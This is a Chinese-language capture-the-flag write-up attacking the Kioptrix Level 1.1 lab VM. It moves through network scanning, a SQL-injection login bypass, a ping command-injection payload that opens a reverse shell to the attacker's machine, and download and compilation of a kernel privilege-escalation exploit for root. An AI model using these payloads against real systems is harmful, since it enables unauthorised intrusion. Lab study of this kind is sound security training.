Kioptrix Level 1.1
靶场配置
导入靶场时先将vmx后缀文件中的带有ethernet0的配置行全部删除,再导入靶场,添加一个网络适配器即可
信息收集
查找目标主机ip
┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:84:b2:cc, IPv4: 192.168.158.143
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.158.1 00:50:56:c0:00:08 VMware, Inc.
192.168.158.2 00:50:56:e9:30:53 VMware, Inc.
192.168.158.152 00:0c:29:4f:d6:55 VMware, Inc.
192.168.158.254 00:50:56:f2:30:d4 VMware, Inc.4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.954 seconds (131.01 hosts/sec). 4 responded
扫描开放端口
┌──(root㉿kali)-[~]
└─# nmap 192.168.158.152 -sT -p- --min-rate 1000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-24 23:41 CST
Nmap scan report for 192.168.158.152
Host is up (0.0017s latency).
Not shown: 65528 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
443/tcp open https
631/tcp open ipp
773/tcp open submit
3306/tcp open mysql
MAC Address: 00:0C:29:4F:D6:55 (VMware)Nmap done: 1 IP address (1 host up) scanned in 1.38 seconds
详细扫描每个端口
┌──(root㉿kali)-[~]
└─# nmap 192.168.158.152 -sT -sVC -p22,80,111,443,631,773,3306
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-24 23:44 CST
Nmap scan report for 192.168.158.152
Host is up (0.00026s latency).PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 2.0.52 ((CentOS))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.0.52 (CentOS)
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 770/udp status
|_ 100024 1 773/tcp status
443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_ SSL2_RC4_128_WITH_MD5
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after: 2010-10-08T00:10:47
|_ssl-date: 2025-03-24T12:34:43+00:00; -3h09m39s from scanner time.
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.0.52 (CentOS)
631/tcp open ipp CUPS 1.1
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
| http-methods:
|_ Potentially risky methods: PUT
773/tcp open status 1 (RPC #100024)
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:4F:D6:55 (VMware)Host script results:
|_clock-skew: -3h09m39sService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
扫描一下漏洞
┌──(root㉿kali)-[~]
└─# nmap 192.168.158.152 --script=vuln -p22,80,111,443,631,773,3306
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-24 23:50 CST
Nmap scan report for 192.168.158.152
Host is up (0.00023s latency).PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-enum:
| /icons/: Potentially interesting directory w/ listing on 'apache/2.0.52 (centos)'
|_ /manual/: Potentially interesting folder
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.158.152
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.158.152:80/
| Form id: frmlogin
| Form action: index.php
|
| Path: http://192.168.158.152:80/index.php
| Form id: frmlogin
|_ Form action: index.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-trace: TRACE is enabled
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
111/tcp open rpcbind
443/tcp open https
|_sslv2-drown: ERROR: Script execution failed (use -d to debug)
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
| ssl-dh-params:
| VULNERABLE:
| Transport Layer Security (TLS) Protocol DHE_EXPORT Ciphers Downgrade MitM (Logjam)
| State: VULNERABLE
| IDs: BID:74733 CVE:CVE-2015-4000
| The Transport Layer Security (TLS) protocol contains a flaw that is
| triggered when handling Diffie-Hellman key exchanges defined with
| the DHE_EXPORT cipher. This may allow a man-in-the-middle attacker
| to downgrade the security of a TLS session to 512-bit export-grade
| cryptography, which is significantly weaker, allowing the attacker
| to more easily break the encryption and monitor or tamper with
| the encrypted stream.
| Disclosure date: 2015-5-19
| Check results:
| EXPORT-GRADE DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: mod_ssl 2.0.x/512-bit MODP group with safe prime modulus
| Modulus Length: 512
| Generator Length: 8
| Public Key Length: 512
| References:
| https://weakdh.org
| https://www.securityfocus.com/bid/74733
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000
|
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_AES_128_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: mod_ssl 2.0.x/1024-bit MODP group with safe prime modulus
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
|_ https://weakdh.org
|_http-trace: TRACE is enabled
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.158.152
| Found the following possible CSRF vulnerabilities:
|
| Path: https://192.168.158.152:443/
| Form id: frmlogin
| Form action: index.php
|
| Path: https://192.168.158.152:443/index.php
| Form id: frmlogin
|_ Form action: index.php
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| ssl-ccs-injection:
| VULNERABLE:
| SSL/TLS MITM vulnerability (CCS Injection)
| State: VULNERABLE
| Risk factor: High
| OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
| does not properly restrict processing of ChangeCipherSpec messages,
| which allows man-in-the-middle attackers to trigger use of a zero
| length master key in certain OpenSSL-to-OpenSSL communications, and
| consequently hijack sessions or obtain sensitive information, via
| a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|
| References:
| http://www.openssl.org/news/secadv_20140605.txt
| http://www.cvedetails.com/cve/2014-0224
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
| http-enum:
| /icons/: Potentially interesting directory w/ listing on 'apache/2.0.52 (centos)'
|_ /manual/: Potentially interesting folder
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: VULNERABLE
| IDs: BID:70574 CVE:CVE-2014-3566
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the "POODLE" issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_RSA_WITH_AES_128_CBC_SHA
| References:
| https://www.imperialviolet.org/2014/10/14/poodle.html
| https://www.openssl.org/~bodo/ssl-poodle.pdf
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|_ https://www.securityfocus.com/bid/70574
631/tcp open ipp
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
773/tcp open submit
3306/tcp open mysql
MAC Address: 00:0C:29:4F:D6:55 (VMware)
80端口信息收集
目录扫描
┌──(root㉿kali)-[~/vulnhub/Kioptrix_Level_1.1]
└─# dirsearch -u http://192.168.158.152/ -e*
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.htmlfrom pkg_resources import DistributionNotFound, VersionConflict_|. _ _ _ _ _ _|_ v0.4.3(_||| _) (/_(_|| (_| )Extensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz
HTTP method: GET | Threads: 25 | Wordlist size: 14594Output File: /root/vulnhub/Kioptrix_Level_1.1/reports/http_192.168.158.152/__25-03-24_23-52-05.txtTarget: http://192.168.158.152/[23:52:05] Starting:
[23:52:07] 403 - 294B - /.ht_wsr.txt
[23:52:07] 403 - 297B - /.htaccess.bak1
[23:52:07] 403 - 297B - /.htaccess.orig
[23:52:07] 403 - 299B - /.htaccess.sample
[23:52:07] 403 - 297B - /.htaccess_orig
[23:52:07] 403 - 297B - /.htaccess.save
[23:52:07] 403 - 298B - /.htaccess_extra
[23:52:07] 403 - 295B - /.htaccess_sc
[23:52:07] 403 - 295B - /.htaccessBAK
[23:52:07] 403 - 295B - /.htaccessOLD
[23:52:07] 403 - 296B - /.htaccessOLD2
[23:52:07] 403 - 288B - /.html
[23:52:07] 403 - 287B - /.htm
[23:52:07] 403 - 297B - /.htpasswd_test
[23:52:07] 403 - 294B - /.httr-oauth
[23:52:07] 403 - 293B - /.htpasswds
[23:52:19] 403 - 291B - /cgi-bin/
[23:52:23] 403 - 289B - /error/
[23:52:29] 200 - 7KB - /manual/index.html
[23:52:29] 301 - 319B - /manual -> http://192.168.158.152/manual/
[23:52:40] 403 - 288B - /usage
漏洞查找与利用
万能密码进入后台
POST /index.php HTTP/1.1
Host: 192.168.158.152
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
Origin: http://192.168.158.152
Connection: keep-alive
Referer: http://192.168.158.152/index.php
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Pragma: no-cache
Cache-Control: no-cacheuname=admin&psw=1%27+or+%271%27%3D%271&btnLogin=Login
rce getshell
经典的ping命令使用管道符或者分号执行其他命令反弹shell
payload:127.0.0.1;sh -i >& /dev/tcp/192.168.158.143/1122 0>&1
内核提权
查找带有suid权限的命令
bash-3.00$ find / -type f -perm -4000 2>/dev/null
find / -type f -perm -4000 2>/dev/null
/sbin/unix_chkpwd
/sbin/pam_timestamp_check
/sbin/pwdb_chkpwd
/usr/sbin/ccreds_validate
/usr/sbin/userhelper
/usr/sbin/userisdnctl
/usr/sbin/suexec
/usr/sbin/usernetctl
/usr/libexec/openssh/ssh-keysign
/usr/libexec/pt_chown
/usr/kerberos/bin/ksu
/usr/lib/squid/pam_auth
/usr/lib/squid/ncsa_auth
/usr/bin/chsh
/usr/bin/rcp
/usr/bin/sudo
/usr/bin/chage
/usr/bin/crontab
/usr/bin/rlogin
/usr/bin/rsh
/usr/bin/gpasswd
/usr/bin/at
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/lppasswd
/usr/bin/sg
/usr/bin/passwd
/bin/mount
/bin/traceroute6
/bin/traceroute
/bin/umount
/bin/ping6
/bin/ping
/bin/su
查看系统内核版本
bash-3.00$ uname -a
uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
bash-3.00$ lsb_release -a
lsb_release -a
LSB Version: :core-3.0-ia32:core-3.0-noarch:graphics-3.0-ia32:graphics-3.0-noarch
Distributor ID: CentOS
Description: CentOS release 4.5 (Final)
Release: 4.5
Codename: Final
查找相关版本漏洞
┌──(root㉿kali)-[~/vulnhub/Kioptrix_Level_1.1]
└─# searchsploit Linux 2.6 centos
------------------------------------------------------------------------ ---------------------------------Exploit Title | Path
------------------------------------------------------------------------ ---------------------------------
Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/1 | linux/local/9545.c
Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 | linux/local/9479.c
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4 | linux_x86/local/9542.c
Linux Kernel 2.6.32 < 3.x (CentOS 5/6) - 'PERF_EVENTS' Local Privilege | linux/local/25444.c
Linux Kernel 2.6.x / 3.10.x / 4.14.x (RedHat / Debian / CentOS) (x64) - | linux_x86-64/local/45516.c
------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
下载、编译、运行
bash-3.00$ wget http://192.168.158.143:1100/9542.c
wget http://192.168.158.143:1100/9542.c
--10:06:50-- http://192.168.158.143:1100/9542.c=> `9542.c'
Connecting to 192.168.158.143:1100... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,535 (2.5K) [text/x-csrc]100%[====================================>] 2,535 --.--K/s 10:06:50 (604.39 MB/s) - `9542.c' saved [2535/2535]bash-3.00$ ls
ls
9542.c linux-exploit-suggester.sh test
bash-3.00$ gcc 9542.c -o test
gcc 9542.c -o test
9542.c:109:28: warning: no newline at end of file
bash-3.00$ ls
ls
9542.c linux-exploit-suggester.sh test
bash-3.00$ chmod +x test
chmod +x test
bash-3.00$ ./test
./test
sh-3.00# id
id
uid=0(root) gid=0(root) groups=48(apache)
sh-3.00#
总结
本靶机就是弱口令->命令执行getshell->内核提权
E2 Canteen (Hard Version) 对于旋转操作的深入理解)
